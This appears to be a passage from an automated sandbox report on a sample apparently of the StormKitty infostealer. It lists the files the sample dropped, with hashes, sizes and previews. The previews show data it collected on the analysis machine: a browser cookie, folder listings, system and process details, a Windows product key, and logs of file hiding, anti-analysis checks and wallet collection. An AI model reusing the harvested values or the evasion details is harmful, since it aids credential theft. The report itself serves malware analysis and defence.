Preview:	.google.com.TRUE./.FALSE.13261762877462365.NID.204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\Desktop.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	898
Entropy (8bit):	5.4067989607524325
Encrypted:	false
SSDEEP:	24:gxREEQvEvvsBcEP6SuAhm0fTD7ey9iHQAvsiJV:IWsvvsBcQbuSTDSy90QAvs8V
MD5:	35298B8EDBA46BB31BE4FF251A5D3D1E
SHA1:	02EB88E4177030BFFD083238C16429B2F201A04B
SHA-256:	6EC06F2ADA2C169C283FDEF55EF0B634B8CFD296D3D4FD14506F4E91F27FC206
SHA-512:	E55E0D70445110EA600488E6BF218B6F4FBAB75342A28BA4C60E722BD4DAD81B4C8CD44147C90F17222DA8B4942BD08484A8A5DD761CCD813EAB2EF6FC5BF4EE
Malicious:	false
Reputation:	unknown
Preview:	Desktop\...EEGWXUHVUG\...EIVQSAOTAQ\...EOWRVPQCCS\...JDDHMPCDUJ\...NVWZAPQSQL\...PWCCAWLGRE\....GRXZDKKVDB.png....NVWZAPQSQL.jpg....PALRGUCVEH.mp3....PIVFAGEAAV.xlsx....PWCCAWLGRE.docx....SQSJKEBWDT.pdf...QCFWYSKMHA\....BNAGMGSPLO.png....PIVFAGEAAV.jpg....PWCCAWLGRE.xlsx....QCFWYSKMHA.docx....SQSJKEBWDT.mp3....SUAVTZKNFL.pdf...SUAVTZKNFL\....EFOYFBOLXA.pdf....GIGIYTFFYT.mp3....PALRGUCVEH.jpg....SQSJKEBWDT.xlsx....SUAVTZKNFL.docx....ZGGKNSUKOP.png...ZIPXYXWIOY\...18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe...BNAGMGSPLO.png...desktop.ini...EFOYFBOLXA.pdf...Excel 2016.lnk...GIGIYTFFYT.mp3...GRXZDKKVDB.png...Microsoft Edge.lnk...NVWZAPQSQL.jpg...PALRGUCVEH.jpg...PALRGUCVEH.mp3...PIVFAGEAAV.jpg...PIVFAGEAAV.xlsx...PWCCAWLGRE.docx...PWCCAWLGRE.xlsx...QCFWYSKMHA.docx...SQSJKEBWDT.mp3...SQSJKEBWDT.pdf...SQSJKEBWDT.xlsx...SUAVTZKNFL.docx...SUAVTZKNFL.pdf...Word 2016.lnk...ZGGKNSUKOP.png..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\Documents.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	911
Entropy (8bit):	5.327784038785361
Encrypted:	false
SSDEEP:	24:gkxrEE6EEQvEvvsBcEP6sjTCriHQAvs+V:LBEE6WsvvsBcQZTCr0QAvs+V
MD5:	A9B84A099071730F1F7CA9FF71E68E06
SHA1:	F50B51E1C9D014FEC17FBEB1E174366D2EC7A1F5
SHA-256:	14CC4862319B72D45ACB12B18156DEC667E7D1338D2451C518674393741D568D
SHA-512:	E6D72F9B76BF85B00398D70903FD18E80AEF94ECA79333841780CD36071F533CC2FC8E735A4A06E142C42B0288E23EE36A1A8EE191E0522800A8DBC883996E70
Malicious:	false
Reputation:	unknown
Preview:	Documents\...EEGWXUHVUG\...EIVQSAOTAQ\...EOWRVPQCCS\...JDDHMPCDUJ\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NVWZAPQSQL\...PWCCAWLGRE\....GRXZDKKVDB.png....NVWZAPQSQL.jpg....PALRGUCVEH.mp3....PIVFAGEAAV.xlsx....PWCCAWLGRE.docx....SQSJKEBWDT.pdf...QCFWYSKMHA\....BNAGMGSPLO.png....PIVFAGEAAV.jpg....PWCCAWLGRE.xlsx....QCFWYSKMHA.docx....SQSJKEBWDT.mp3....SUAVTZKNFL.pdf...SUAVTZKNFL\....EFOYFBOLXA.pdf....GIGIYTFFYT.mp3....PALRGUCVEH.jpg....SQSJKEBWDT.xlsx....SUAVTZKNFL.docx....ZGGKNSUKOP.png...ZIPXYXWIOY\...BNAGMGSPLO.png...desktop.ini...EFOYFBOLXA.pdf...GIGIYTFFYT.mp3...GRXZDKKVDB.png...NVWZAPQSQL.jpg...PALRGUCVEH.jpg...PALRGUCVEH.mp3...PIVFAGEAAV.jpg...PIVFAGEAAV.xlsx...PWCCAWLGRE.docx...PWCCAWLGRE.xlsx...QCFWYSKMHA.docx...SQSJKEBWDT.mp3...SQSJKEBWDT.pdf...SQSJKEBWDT.xlsx...SUAVTZKNFL.docx...SUAVTZKNFL.pdf...ZGGKNSUKOP.png..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\Downloads.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.259969024476253
Encrypted:	false
SSDEEP:	6:3tcw5LK5t2th79osl77LdMWD1YDBHvU+UUb7mKbxWdx1Kihivs+V:aw5LKTC5liWRYFPBUUQgbvs+V
MD5:	DA62BB62C5A8977E471F049A6576AB44
SHA1:	265CC1AF7B4DC3EF15BBE8A7B5F63FD2FD6BE5A8
SHA-256:	300F31AA2DF01074650899BC52EA187CE6C363CE863163BD0F46B1BA26C42CC1
SHA-512:	FC2557B48DC0FA4492415E8E3173D8CBC6E45739174B9316477A9E8B737A3CB0985C9C2813807DBAF36D9FC1D60BDA39CDE2982C98D3A2EC865BB0AB56C66402
Malicious:	false
Reputation:	unknown
Preview:	Downloads\...BNAGMGSPLO.png...desktop.ini...EFOYFBOLXA.pdf...GIGIYTFFYT.mp3...GRXZDKKVDB.png...NVWZAPQSQL.jpg...PALRGUCVEH.jpg...PALRGUCVEH.mp3...PIVFAGEAAV.jpg...PIVFAGEAAV.xlsx...PWCCAWLGRE.docx...PWCCAWLGRE.xlsx...QCFWYSKMHA.docx...SQSJKEBWDT.mp3...SQSJKEBWDT.pdf...SQSJKEBWDT.xlsx...SUAVTZKNFL.docx...SUAVTZKNFL.pdf...ZGGKNSUKOP.png..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\OneDrive.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.2776134368191165
Encrypted:	false
SSDEEP:	3:1hiRn:14Rn
MD5:	1DA31A8EA979A8627E1C0630291B5B26
SHA1:	903725300CBC8EEBD49847428F00AB6C20729D67
SHA-256:	55FE800A4DA9F2E2A8C3EF6D768302B0CAC54DC55587812976CA493C276BAE30
SHA-512:	220484AD810BA043CEB3C918E0472AA0F3A35D7F04C2BF8ADA31109012C2FDAA083A2ACD4AE20207608B83D54CDF0D4F077FF9B8027A6786E65548F8834E7AC6
Malicious:	false
Reputation:	unknown
Preview:	OneDrive\..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\Pictures.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.401826932053255
Encrypted:	false
SSDEEP:	3:YzIVqIPLKKrLKB:nqyLKCLKB
MD5:	154A3A46F2AC154FD11B51AE37F7BFB0
SHA1:	5FF354343773ACBFB8973DF4B0D96FAFA5842668
SHA-256:	BCF4D37446D020F5B6214E9896E607C7BDAFA7C118C0C3DC766211EC63AB841A
SHA-512:	12CADFFFA2F45B77D48F30FE8C63E9FC5FF7712CD9C2AF275052722D5640DD4E7AE2D9C3D07328833438295CB63EB6F4A37CB82623453618E00B4F23A95618BC
Malicious:	false
Reputation:	unknown
Preview:	Pictures\...Camera Roll\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\Startup.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Reputation:	unknown
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\Temp.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	4.858817282535697
Encrypted:	false
SSDEEP:	24:4BVVAajYbUoF5/lxQ/gzhC1VXYEr5n62YQGcStI8kR7Hk+nsyc/:4qajsUoF9Q/gzkLXvr5n+QGVtI8kRE/L
MD5:	535132D0F7F6EDCBBDD4D022E9AF5D4A
SHA1:	B7B334FCA23FA28753414A7EB726B223653445EA
SHA-256:	1B280C67C1663B99562E8FD7BD12C46500BD62957AF83DF64754118EA6C1DC38
SHA-512:	EEDC7525AB812A33167095E806F0D64EBECB58D443F072409312D73247BED2DB3FF081DD6CDE7CFBDAB1777500E326BF5BD35EC6E2E71C7E4CCD6FA6B068B7C4
Malicious:	false
Reputation:	unknown
Preview:	Temp\...acrocef_low\...acrord32_sbx\...CR_8F2A8.tmp\....setup.exe...Low\....JavaDeployReg.log...ua2xswh0.fpx\....unarchiver.log...0196354653...0409654664...0450125302...0518291756...0653671941...0666563528...0982390758...1033868256...1141274626...1237160943...1239919175...1244065654...1287572840...1343496627...1422339599...1927994670...2103954313...2168651637...2265332024...2265465471...2385760553...2585558601...2843307863...3024948866...3322604653...3476888679...3643399760...3677062445...4054640694...4736274156...4941266003...5064077962...5281104033...5491630718...5622580005...5713452101...5809130301...6092905029...6109303877...6183211589...6213653276...6329227256...6422942404...6483516391...6750529025...7011884383...7155756679...7216804956...7245361316...7457734050...7676687441...8182259827...8200946536...8492240360...8552718761...8784112376...8886835349...8975065801...8995528179...9106464316...9217021447...9275373402...9329238007...9422479677...9655434068...9659692161...9925478147..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\Directories\Videos.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Reputation:	unknown
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\System\Apps.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	491
Entropy (8bit):	5.027444140583612
Encrypted:	false
SSDEEP:	12:Oxyff2l+VT/wQ/gtff2l+VmQkCff2l+VywV:OxIf2l+t/wQ4hf2l+gQk4f2l+swV
MD5:	B293FDC457E855064BB58882F5DFD29A
SHA1:	B1F5105B50022499855487DEDF446E01E794B9B0
SHA-256:	9B680EC5C103F142124A8B0F8BEC8E30C65B2313AD46FEE71C2725CFA76BB5C8
SHA-512:	18A28D8AFFDD674F40E0BC63D37E663E0BC243CDBB15179C36DD7F446DEDB236EB0E7B0D71720D4C2EE2AEE5B1E1DC3EEA125EA90FD5460A4EE77E85F0295B68
Malicious:	false
Reputation:	unknown
Preview:	.APP: Microsoft DCF MUI (English) 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 04/09/2022 19:18:43..IDENTIFYING NUMBER: {90160000-0090-0409-0000-0000000FF1CE}...APP: Microsoft Office Professional Plus 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 04/09/2022 19:18:43..IDENTIFYING NUMBER: {90160000-0011-0000-0000-0000000FF1CE}...APP: Microsoft OneNote MUI (English) 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 04/09/2022 19:18:43..IDENTIFYING NUMBER: {90160000-00A1-0409-0000-0000000FF1CE}..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\System\Debug.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	UTF-8 Unicode text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2063
Entropy (8bit):	5.042169334592198
Encrypted:	false
SSDEEP:	48:f6gxa6g3E6g9f1g9b6g+gSZmvGthudKz3ihhudKzzr3mvGthudKz3ihhudKzzrF:ftajEi+Tu8zyTu8zzrhu8zyTu8zzrF
MD5:	17D1544C67ADB92F701C1A702D4B39D1
SHA1:	3FAB650DAD38BF1D1A8B0D80195016CB8E2EF089
SHA-256:	EE9C17ED49F144BE5DF590D051592886053A2932B596F71D726EAF1D88DE7D52
SHA-512:	D8073B1E08B79EA709D77BDD8AFD641E21AF83961D11C781CEF2C794F2C282568D47404438AA1A478FC5D941158FE1C02E59F8944D532B85D03F42E3E2377985
Malicious:	false
Reputation:	unknown
Preview:	HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\632783881659e232750f71880779d5da.HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\Temp\chormuim.exe.StartDelay : Sleeping 7665.AntiAnalysis : Hosting detected!.HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\Temp\DotNetZip.dll.SetFileCreationDate : Changing file C:\Users\user\AppData\Local\Temp\DotNetZip.dll creation data.HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\Temp\AnonFileApi.dll.SetFileCreationDate : Changing file C:\Users\user\AppData\Local\Temp\AnonFileApi.dll creation data.Steam >> Application path not found in registry.Wallets >> Failed collect wallet from registry.System.NullReferenceException: Object reference not set to an instance of an object... at .........................................................

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\System\Desktop.jpg Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	94569
Entropy (8bit):	7.917365757639508
Encrypted:	false
SSDEEP:	1536:CFhU7TrodLJ8LnBcKC1olf7hYsK8Y5Pq1vn7cacCX8xKUYFA/MGbNZN803FF6vDr:Ih9dF8li1oxhYs1YtC7dHO/McNLFYr
MD5:	F4DE56C9097BA039DEBE99A779BFFC01
SHA1:	FE30F8A2B5545DFB25249B7BB6A3D4849572CA75
SHA-256:	607081315FCB0CB653F55812F1167572A89469E8E64612366EF53F59BB5EBAD8
SHA-512:	6522F3757130D0F63DD3F3A274E1E14D8FC01510C6C7228185744692B23DBE8B7D77388D5DCF52428F1085E03ED7F8673496A87D33F9F7EB4F36BFE11F598473
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.\|......I"]Z...I.y..[

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\System\Info.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	510
Entropy (8bit):	5.42922545798507
Encrypted:	false
SSDEEP:	12:RFTwPRbVkb2JuW2YaWEV+YjNszJxAIW/v5Xyl:3TwP/kbaRaB+YjNQJxAIWZI
MD5:	B7494ED701D0F966AB3015A52AC5487E
SHA1:	A99A58DCCFD15EFD416DAC65088EC958E73FF3A6
SHA-256:	6589DA1163E41311DD86A0537446880E200CC1617D684716587E90F258E3FA00
SHA-512:	BCD50B247C313F5E6165FF3FBF57E2C346097FF5DF5BF85567374FCFAF605345E9088331DB5479F4F86F6B8B2294F3D0AA5E735964228CCC378B68252B410207
Malicious:	false
Reputation:	unknown
Preview:	.[IP].External IP: 84.17.52.18.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 936905.System: Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: WG6VM9MF.RAM: 4094MB.DATE: 2022-01-14 1:49:28 PM.SCREEN: 1280x1024.BATTERY: NoSystemBattery (1%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: True.Debugger: False.Processe: False.Hosting: True.Antivirus: Windows Defender..

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\System\Process.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1424
Entropy (8bit):	5.588175000180968
Encrypted:	false
SSDEEP:	24:pvbhTALy01IE6l8TOfZHVpXHVhTlLy01IE6l8TOnksgJElzTgEhT9Ly01IE6l8Tm:r2y0qXsKLXBy0qXstsj5y0qXsI6y0qXB
MD5:	B2F124639418316BDA76E54DF69D45F1
SHA1:	27B39A6D36B961F3D24268FCA376447C8383D0BF
SHA-256:	B58068F8000639264E61A5CB225D4BEC440015AF3971E03A53DC040822302447
SHA-512:	6BE2936C99250BC5CED9C12DDA97D06FD2B9A5F4CECBB93711D2B9C4B2FC7BD1C746677929124E7FD6DD591AE05956A4179F2872A7CBD41C35E53FE74DFC8246
Malicious:	false
Reputation:	unknown
Preview:	NAME: dwm..PID: 984..EXE: C:\Windows\system32\dwm.exe..NAME: csrss..PID: 392..EXE: ..NAME: UqEElYeBefdWnvjOQuAWcv..PID: 5716..EXE: C:\Program Files (x86)\WUZCPkNPlPohVtJaNxOMULnRzPcEttAhqTmjLXihpzSoFftEwPvAWpG\UqEElYeBefdWnvjOQuAWcv.exe..NAME: WmiPrvSE..PID: 3040..EXE: C:\Windows\system32\wbem\wmiprvse.exe..NAME: svchost..PID: 1568..EXE: C:\Windows\System32\svchost.exe..NAME: dllhost..PID: 4916..EXE: C:\Windows\system32\DllHost.exe..NAME: svchost..PID: 2156..EXE: c:\windows\system32\svchost.exe..NAME: UqEElYeBefdWnvjOQuAWcv..PID: 4716..EXE: C:\Program Files (x86)\WUZCPkNPlPohVtJaNxOMULnRzPcEttAhqTmjLXihpzSoFftEwPvAWpG\UqEElYeBefdWnvjOQuAWcv.exe..NAME: svchost..PID: 1760..EXE: ..NAME: svchost..PID: 2968..EXE: c:\windows\system32\svchost.exe..NAME: svchost..PID: 6940..EXE: c:\windows\system32\svchost.exe..NAME: UsoClient..PID: 5104..EXE: C:\Windows\system32\usoclient.exe..NAME: services..PID: 572..EXE: ..NAME: taskshell..PID: 3132..EXE: C:\ProgramData\AMD Driver\taskshell.exe..NAME: UqEE

C:\Users\user\AppData\Local\632783881659e232750f71880779d5da\user@936905_en-US\System\ProductKey.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.047299098426644
Encrypted:	false
SSDEEP:	3:/Md04WP2:/Me1P2
MD5:	5DC756E9441AB4845AFFA1E3B45A8B4A
SHA1:	8DD6A283F64BE8CBE6D127CDF2585F1CB6376D75
SHA-256:	6E7A8400007CBA5879E6315A942EFD98FC176D939B683F5791F7AE4FC140147A
SHA-512:	458FF5AF05D78C13724A56AE6073266F0EA78F807D412489AE8FCB3CFD29D690D9FC74F577336A7211E7D551F244E43E7412BC5F29D3D19C9C5A6D63D87B4C85
Malicious:	false
Reputation:	unknown
Preview:	VG6N9-W7H7P-TTD8F-D7434-P4KYB

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.log Download File
Process:	C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	859
Entropy (8bit):	5.373981576136143
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhk:MxHKn1qHGiD0HKeGiYHKGD8Aok
MD5:	FCA6F8F70EDB011978C6161B2715F1D5
SHA1:	6AC99F9E4E12508A5F821AB3EBA79C256FEF60A1
SHA-256:	5D1375876DA08D3A08DFFF8180872B6961402832987E4C71E902B1B15FF382B7
SHA-512:	901B570F152D2ED442D8EDBAECE834D40BAB10402CFEA3CBA2DA9AFAEB2AC1D94DB0DE3CB4783A03CB362EA46257C036CCC3627447BC70DAB9D56FD4AB21DCA8
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\chormuimii.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuimii.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.345981753770044
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLUE4K5E4Ks2wKDE4KhK3VZ9pKhk
MD5:	044A637E42FE9A819D7E43C8504CA769
SHA1:	6FCA27B1A571B73563C8424C84F4F64F3CBCBE2F
SHA-256:	E88E04654826CE00CC7A840745254164DDBD175066D6E4EA6858BF0FE463EBB4
SHA-512:	C9A74FA4154FA5E5951B0EEAC5330CA4BAC981FF9AD24C08575A76AD5D99CFB68556B9857C9C8209A1BFCB43F82E00F14962987A18A92A715F45AD0D4E4A718C
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	300544
Entropy (8bit):	7.2955035136033635
Encrypted:	false
SSDEEP:	6144:1YYua6E5OQB+4M5erCkGQ+Qo2gxYQWoclJjzNV0zFKZ2v92PTr3g2uKGYPbRiWm:1pgI1BTMEGkYjxYQWoEJHNV0SPTrw2ux
MD5:	7A2D5DEAB61F043394A510F4E2C0866F
SHA1:	CA16110C9CF6522CD7BEA32895FD0F697442849B
SHA-256:	75DB945388F62F2DE3D3EAAE911F49495F289244E2FEC9B25455C2D686989F69
SHA-512:	B66B0BF227762348A5EDE3C2578D5BC089C222F632A705241BCC63D56620BEF238C67CA2BD400BA7874B2BC168E279673B0E105B73282BC69AA21A7FD34BAFE0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 44%, Browse Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........a... ........... .......................@............@.................................pt..(............................ .......................................................................?..H............text....L... ...................... ..`.vmp0...............................`..`.vmp1...d....`......................`..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DotNetZip.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	458752
Entropy (8bit):	6.817106205315454
Encrypted:	false
SSDEEP:	6144:FuCIjOL8qwWN/jMlC/XiapWSu9vnITVxGtSV41kJDsTDD5rlGe6wfxLV/7:dZLJLdvOSsnjS4csBrge6sf7
MD5:	6D1C62EC1C2EF722F49B2D8DD4A4DF16
SHA1:	1BB08A979B7987BC7736A8CFA4779383CB0ECFA6
SHA-256:	00DA1597D92235D3F84DA979E2FA5DBF049BAFB52C33BD6FC8EE7B29570C124C
SHA-512:	C0DCE8EAA52EB6C319D4BE2EEC4622BB3380C65B659CFB77FF51A4ADA7D3E591E791EE823DAD67B5556FFAC5C060FF45D09DD1CC21BAAF70BA89806647CB3BD2
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^.........." ..0.................. ... ....... .......................`.......w....@.................................d...O.... .......................@......,................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......`...l.............../............................................{...."..}.......(......0..F.......s....%r...po ....{.........(<...o ...r...po ....\|....(!...o ...&o"......0...........s#......o$...(.....0.............{......E............,.......8...D...+Q..{..........+M..{.......+A..{..........+2..{.......+&..{.......+...{..........+.r...ps%...z.6..ol...(......(....*....0..a.......s....%.\|..........o"...o ...r...po ....{.........(<...o ...r...po ....\|....r#..p

C:\Users\user\AppData\Local\Temp\StormKitty-Latest.log Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	UTF-8 Unicode text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2748
Entropy (8bit):	4.913429080351274
Encrypted:	false
SSDEEP:	48:f6gxa6g3E6g9f1g9b6g+gSZmvGthudKz3ihhudKzzr3mvGthudKz3ihhudKzzr3U:ftajEi+Tu8zyTu8zzrhu8zyTu8zzrhu7
MD5:	A27038E7054740BEB9001D3DD38D6EC9
SHA1:	B8F70A4B07EB860050463C81EBEEF5EB0C457F48
SHA-256:	9E31B62C12A49655CF29FC36CEBFF494CE46BD01467F6672D62D981BEE41E6BE
SHA-512:	C4B10CDDA52AB1A809352CD3B844F280D6F9EA7F71F6BC829FF47234822ADAD8C62489152D1992A5528E09BD8F1C41F78089C8B8DAAD0D2BD2F76F942EDBFF74
Malicious:	false
Reputation:	unknown
Preview:	HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\632783881659e232750f71880779d5da.HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\Temp\chormuim.exe.StartDelay : Sleeping 7665.AntiAnalysis : Hosting detected!.HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\Temp\DotNetZip.dll.SetFileCreationDate : Changing file C:\Users\user\AppData\Local\Temp\DotNetZip.dll creation data.HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\Temp\AnonFileApi.dll.SetFileCreationDate : Changing file C:\Users\user\AppData\Local\Temp\AnonFileApi.dll creation data.Steam >> Application path not found in registry.Wallets >> Failed collect wallet from registry.System.NullReferenceException: Object reference not set to an instance of an object... at .........................................................

C:\Users\user\AppData\Local\Temp\chormuim.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuimii.exe
